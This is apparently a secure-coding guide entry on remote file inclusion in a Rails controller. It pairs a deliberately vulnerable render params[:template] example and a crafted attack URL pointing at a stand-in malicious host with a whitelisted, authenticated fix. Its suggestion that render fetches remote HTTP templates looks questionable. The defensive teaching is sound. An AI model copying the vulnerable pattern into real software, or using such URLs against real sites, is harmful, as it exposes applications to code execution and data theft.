Need

Prevention of remote file inclusion and execution

Context

• Usage of Ruby 2.5 for executing Ruby code and running Ruby applications
• Usage of Rails framework for building web applications
• Usage of ActiveRecord for Object-Relational Mapping (ORM) in database operations

Description

Non compliant code

        class UserController < ApplicationController
  def index
    @user = User.find(params[:id])
    render params[:template]
  end
end
        
        

In the above code, we have a UserController with an index action that fetches a user from the database using an id passed in via params. After fetching the user, it renders a template also passed in via params.

The vulnerability here lies in the use of params[:template] in the render method. This allows an attacker to pass in a path to a malicious template that resides in a remote location. This is known as Remote File Inclusion (RFI).

For instance, an attacker could craft a URL such as http://yourwebsite.com/user/index?template=http://maliciouswebsite.com/malicious_template. When this URL is accessed, the application would fetch the malicious template from the remote server and render it, leading to potential data leakage or remote command execution.

Steps

• Sanitize user input: Validate and sanitize any user input before using it to render templates.
• Whitelist allowed templates: Create a whitelist of allowed templates and only render templates from this list.
• Avoid dynamic template rendering: Instead of allowing users to specify the template to render, use a fixed template or a limited set of predefined templates.
• Implement access controls: Ensure that only authorized users can access the UserController#index action.
• Keep the application and dependencies up to date: Regularly update the Ruby on Rails framework and its dependencies to benefit from security patches and fixes.
• Implement a Web Application Firewall (WAF): Use a WAF to detect and block attempts to exploit remote file inclusion vulnerabilities.
• Perform security testing: Regularly conduct security testing, such as penetration testing and code reviews, to identify and fix vulnerabilities.

Compliant code

        class UserController < ApplicationController
  before_action :authenticate_user!
  TEMPLATE_WHITELIST = ['template1', 'template2', 'template3']

  def index
    @user = User.find(params[:id])
    template = params[:template]
    if TEMPLATE_WHITELIST.include?(template)
      render template
    else
      render 'default_template'
    end
  end
end
        
        

The updated code includes several measures to mitigate the risk of Remote File Inclusion:

1. Sanitize user input: The params[:template] is now checked against a whitelist of allowed templates ( TEMPLATE_WHITELIST). If the provided template is not in the whitelist, a default template is rendered. This ensures that only valid templates can be rendered, preventing the inclusion of malicious files.

2. Whitelist allowed templates: The TEMPLATE_WHITELIST constant is a list of allowed templates. This is a form of input validation that ensures only predefined templates can be rendered.

3. Avoid dynamic template rendering: By checking the user-provided template against a whitelist, the application no longer allows arbitrary templates to be rendered. This reduces the attack surface for Remote File Inclusion.

4. Implement access controls: The before_action :authenticate_user! ensures that only authenticated users can access the index action. This is a form of access control that can prevent unauthorized access to sensitive data.

Remember to keep your application and its dependencies up to date, implement a Web Application Firewall (WAF), and perform regular security testing to further enhance the security of your application.

References

• 061. Remote File Inclusion